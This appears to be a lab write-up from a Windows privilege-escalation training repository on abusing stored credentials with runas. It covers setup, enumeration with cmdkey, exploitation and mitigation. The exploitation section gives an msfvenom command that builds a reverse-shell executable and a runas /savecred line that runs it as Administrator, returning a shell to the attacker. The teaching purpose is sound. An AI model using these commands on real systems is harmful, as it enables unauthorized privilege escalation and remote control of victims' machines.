Skip to content

Latest commit

 

History

History
120 lines (70 loc) · 4.73 KB

StoredCredentialsRunas.md

File metadata and controls

120 lines (70 loc) · 4.73 KB
Raw

Stored Credentials (Runas)

Back to Main

Table of Contents

Description

The Credentials Manager is a feature in Windows that securely stores usernames and passwords for websites, applications, and network resources. This component is particularly helpful for users who want to manage and retrieve their login information easily without having to remember each set of credentials.

In a scenario where an attacker has compromised an account with access to the Windows Credentials Manager and has obtained stored credentials from an elevated account, he can potentially use the "runas" command to elevate his privileges and gain unauthorized access.

Lab Setup

Manual Lab Setup

⚠️ If you are using Windows 10 to proceed with this scenario, the local Administrator account needs to be enabled. I have created a PowerShell script named EnableLocalAdmin.ps1, designed to enable the local Administrator account and set a password. Please run this script with elevated privileges.

  1. Open a command prompt with local Administrator privileges and execute the following command to store credentials in the Windows Credentials Manager:
runas /savecred /user:WORKGROUP\Administrator cmd.exe

Outcome:

Stored-Creds-Manual-Lab-Setup

  1. Verify the new stored credentials on Windows Credentials Manager (Control Panel > User Accounts > Credential Manager):

Stored-Creds-Verify-New-Windows-Creds

PowerShell Script Lab Setup

⚠️ If you are using Windows 10/11 to proceed with this scenario, the local Administrator account needs to be enabled. I have created a PowerShell script named EnableLocalAdmin.ps1, designed to enable the local Administrator account and set a password. Please run this script with elevated privileges.

To set up the lab with the 'Stored Credentials (Runas)' scenario is by using the custom PowerShell script named StoredCredentialsRunas.ps1.

Open a PowerShelll with local Administrator privileges and run the script:

.\StoredCredentialsRunas.ps1

ℹ️ Please provide the password generated for the runas command.

Outcome:

Stored-Creds-Tool-Lab-Setup

Enumeration

To perform enumeration, you can open a command prompt and use the following command to enumerate the stored credentials in the Windows Credentials Manager:

cmdkey /list

Outcome:

Stored-Creds-Enum

Exploitaion

To abuse this scenario you should follow these steps:

  1. Create with msfvenom a malicous executable file (i.e., nikos.exe):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f exe > nikos.exe

  1. Transfer the malicious executable file to victim's machine.

  2. Open a listener from your attacking machine.

  3. Open a command-prompt with regular user privileges and execute the following command:

runas /savecred /user:WORKGROUP\Administrator "C:\Windows\Tasks\nikos.exe"
  1. Verify the new reverse shell from your attacking machine:

Stored-Creds-Exploitation-Attacker-Side

Mitigation

To mitigate stored credentials from Windows Credentials manager. Please follow these steps:

  1. Open Control Panel and navigate User Accounts > Credential Manager:

Stored-Creds-Control-Panel

  1. Select Windows Credentials, choose your preferred stored credentials, and select the remove option:

Stored-Creds-Remove-Creds

  1. Select the option "Yes" on the pop-up window:

Stored-Creds-Remove-Creds-Confirmation

  1. Verify that the stored credentials have been successfully removed from the Windows Credentials Manager:

Stored-Creds-Remove-Creds-Verification

References